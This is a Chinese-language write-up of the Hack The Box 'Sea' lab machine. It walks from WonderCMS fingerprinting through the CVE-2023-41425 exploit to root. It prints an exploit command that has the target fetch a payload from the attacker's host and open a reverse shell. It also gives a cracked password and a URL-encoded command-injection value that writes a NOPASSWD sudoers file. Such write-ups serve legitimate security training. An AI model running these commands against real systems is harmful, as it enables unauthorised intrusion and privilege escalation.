Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Port & Dir scan

发现一个contact.php。进去看看

尝试抓包看看。并没有什么回显。

尝试扫描一下其他的目录。

dirsearch没扫出来，用gobuster扫描出了一个bike目录。

重要的是这个license

这里暴露出了作者的名字

Github resource

看来网站似乎是用的这个WonderCMS，其中的LICENSE是一模一样的。

当前CMS的版本的3.2.0

而经过查找漏洞，发现在WonderCMS的v3.2.0到v3.4.2之间存在漏洞

CVE-2023-41425

POC地址：insomnia-jacob/CVE-2023-41425: WonderCMS RCE CVE-2023-41425 (github.com)

检查exploit.py中的代码，发现访问的是这个路由

这个路由也是存在的。

那么就开始攻击。

┌──(root㉿kali)-[/home/kali/CVE-2023-41425]
└─# python exploit.py -u http://sea.htb/loginURL -i 10.10.16.16 -p 4444 -r http://10.10.16.16/main.zip

记得要在本地监听端口

回到contact.php，将exp执行后下面出现的link给传上去。

即可反弹shell，当前用户权限是普通的www-data，要想办法提权

kali上有linpeas的脚本，开一个httpserver然后靶机下载就行。记得在/tmp目录下才有写的权限。

成功执行，不过有点慢

发现有这几个CVE。

这个CVE-2021-3156看起来似乎能用。

不过这个几个漏洞都用不了。

Brute Force

在/var/www/sea目录下面发现一个database.js

其中有一个密码字段，这里使用hashcat和rockyou字典来破解，字符串里的反斜杠一定要去掉，不然会报错。（以及虚拟机内存一定要开大一点，原来虚拟机2G的内存连hashcat都跑不起来，把他加大到8个G才成功）

得到密码是：mychemicalromance

查看/etc/passwd，发现有两个可疑的用户名

尝试登陆amay，成功进入！

Privilege Escalation

不过amay并不在超级用户中

之前linpeas的输出中发现有8080和33815这两个端口，不过外部访问不了，只能自己在命令行里看。

有的网站需要用到身份认证，可以使用-u 或者–user 来进行传参，这里用amay的用户密码可以正常访问

ssh -v -N -L 8080:localhost:8080 amay@sea.htb
#v是详细模式，N是只转发端口，L是转发本地端口，这里仅做一个端口映射，便于本地访问

点击access.log之后出现日志，这里可以抓包修改文件名读取任意文件。

不仅如此，还可以执行命令。

尝试给amay加一点权限呢

/etc/passwd+&&+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#
#一定要url编码一下
/etc/passwd+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#

成功拿到root权限

root的flag在root下的root.txt中，user的flag在/home/amay目录里。

Summary

第一次接触国外的在线靶场，感觉这个hackthebox还不错，虽然是边看wp边做的，不过收获还是很多。